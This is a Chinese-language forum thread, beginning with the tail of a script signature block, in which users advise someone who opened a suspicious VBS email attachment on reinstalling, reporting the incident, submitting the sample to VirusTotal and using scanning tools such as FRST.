'' SIG '' qVjuxePYuMBdPRANVvq2Iey1vljPDi9Ijdl03H5wKfJ+
'' SIG '' YD72AgMQGNULoLB1BdmEOsoCwb/btnbkyFLgwykI3DFv
'' SIG '' JvHbkfmFgPbQdHqqVCMULgMR8rXv3OaYq2tDx1bWjhIx
'' SIG '' ggJQMIICTAIBATCBxDCBqzELMAkGA1UEBhMCREUxFDAS
'' SIG '' BgNVBAgMC0JyYW5kZW5idXJnMRswGQYDVQQLDBJQeWVs
'' SIG '' b3RvbXkgR2VvZ3JhZiAxEzARBgNVBAcMCkJydWNoaGFn
'' SIG '' ZW4xETAPBgNVBAoMCERpcmVjdGVkMS4wLAYJKoZIhvcN
'' SIG '' AQkBFh9wcmVzdGlkaWdpdGF0aW9uc0BNYXJjZWxsZXIu
'' SIG '' Q2FtMREwDwYDVQQDDAhEaXJlY3RlZAIUddRka3Ca9e9T
'' SIG '' OyX7pSj316iaXScwDQYJYIZIAWUDBAIBBQCgXjAQBgor
'' SIG '' BgEEAYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYB
'' SIG '' BAGCNwIBBDAvBgkqhkiG9w0BCQQxIgQgea6tUOwE1T/Y
'' SIG '' eAF7moW6Ojl1tsE1vK5XBKz+N7cSQ+IwDQYJKoZIhvcN
'' SIG '' AQEBBQAEggEAwRd6aOaD57rp630YRGuK9kD6+5g3D+XI
'' SIG '' O0ZD8sdRPwVlVdcrydN1XABUXN0Z9CiHfegEY18bxuHy
'' SIG '' qqlJ2mCSAd6RmCd8Mz6D/ObNNUc5/se6fI2JMxEcbNY5
'' SIG '' YrLh3o7oSaTCgMxiC/WC2mpsZeu6cylo3E+gwbEyr6PX
'' SIG '' X+7NxbZAx+9JCIMz1ubFYzseA986wlV90i26WbAIGweZ
'' SIG '' AsPnp2vRdpdGkZq7TlSeKihlTcFNkfcPumsediUcbDl7
'' SIG '' XO1ISBBwrrTgGNA5e3dp4JMKulPpehRXLbKv/PrWbsBb
'' SIG '' Woxu9gUlPvTOM9+c4uIZArznXi2BPC02bgMg+VDQbsj/Eg==
'' SIG '' End signature block
2025-03-10 10:16 發佈
文章關鍵字 衛福部 病毒
我只會重灌!
把vbs用zip打包傳上來帖子裏 加密碼: virus 或infection 然後丟去vt裡補上vt結果並且修正你的帖子

重灌看你要不要做,警告提示企業防毒端點不一定會告訴用戶,那是中控台在顯示的事情!

你們公司業務有這麼機密,企業版防毒那牌那家那個系列 系統啥版本不知道不能寫上去?
我猜不是免費微軟就趨勢吧,畢竟賽門現在變博通鐵克了,續約肯定不俗

我反而比較覺得那個是你公司內部測試你會不會手賤做的黑箱演練,是APT那就好玩了
整個重灌

想賭?賭輸你賠的起?

寄這種信,基本上就是在你電腦植入後門,偷資料、控制權 (沒有沒成功無法判斷)

一但感染整個公司的電腦,就整個gg ,你公司能多久沒電腦?多久能整個重建起來?
lukwama wrote:
因防毒軟體未偵測到威...(恕刪)

電腦作業系統版本請寫清楚,

防毒軟體品牌與版本請註明,

立即向治安機關報案,或循相關通報流程陳報上級。
重灌與否是管理電腦人員mis的事,你有確實回報疑似不明檔案被開起來就好了

最快的處理方式都是重新分割 重新安裝系統

因你不是主機管理者,基本上任何處理作法都沒有意義
因為沒有權限可以殺毒,當然也不見的有權限能執行指令檔案攻擊完全奏效

真要找證據是你需要PE環境跑急救箱 或是自己做FRST LOG上來看

這本來是有時效性的問題 不過看你沒消息大概也是忙著重灌回復備份而已
何必再研究呢
這沒看到東西很難說

你應該請公司IT人員聯絡購買的資安廠商協助
若有花錢買,技術救援諮詢這本來就是售後服務一環

若是用內建微軟防毒沒花錢,那只能說先找別套掃一下......


重灌這個是最後手段,因為弄一下去也可能你一堆資料要備份還有可能很多設定要用。
Dinjapc

1.vt的卡巴不是用掃描而是執行啟發是特強化過的特殊版本 ,企業版有沒有偵測要看你中控的警示。EDR提示什麼而不是單純靠靜態啟發 說過了 你不把樣本拿出來只要靠指令碼文本都有可能讓人分析錯誤

2025-03-10 14:45
Dinjapc

2.這不是釣魚測試而是中國的網軍攻擊 ,因為只有中俄與趨勢可以執行偵測。如果你不想用360 急救箱,只能說你盡早重灌。且當我把你文本的段落取消後再存檔MD5是不一樣的 微軟avast已入庫

2025-03-10 14:49
結論
這段程式碼 可能是惡意的,有以下風險:

試圖透過 WMI 查找 Windows 進程
執行隱藏命令
可能與遠端伺服器聯繫
使用混淆技術隱藏惡意行為
如果你在 系統上發現這個腳本,請立即刪除,並執行 防毒掃描 確保沒有其他惡意程式。

⚠️ 請勿在你的系統上執行這段程式碼!⚠️

by chatgpt
卡飯去年就有類似的帖子,當時是PDF偽裝執行檔.



中文的360急救箱PE來做全機掃描,急救箱會自己列出不是自己360與協力廠商
白名單裡的所有東西,這樣看不懂我也沒轍,就和圖片敘述裡的一樣。

不信大陸安全商可以改用FRST

FRST LOG是唯一還有在長期維護且免費可指令殺毒刪檔的日誌報表工具 從XP到最新的伺服器版

https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/
只是你用戶沒權限 我應該也不用再教要怎樣把日誌跑出來吧!

比較好操作的是hijack this 這個工具


我照你文本修改空格的VBS檔,VT已多了咖啡 AVAST MICROSOFT了


防毒只是把所有的惡意程式都當作病毒在處理,就是不讓你手賤開起來。

至於你執行後它對系統做了甚麼,那些修改增加那些檔案通常不會主動去偵測,那是主動防禦與回滾技術在處理的,這也就是為何你事後殺毒不一定有用的原因,這種企圖撤銷修改再回復移除的技術效果不可能比的上映像檔回復備份。

從結果來說你也是問了個寂寞罷了
  • 2
內文搜尋
X
評分
評分
複製連結
Mobile01提醒您
您目前瀏覽的是行動版網頁
是否切換到電腦版網頁呢?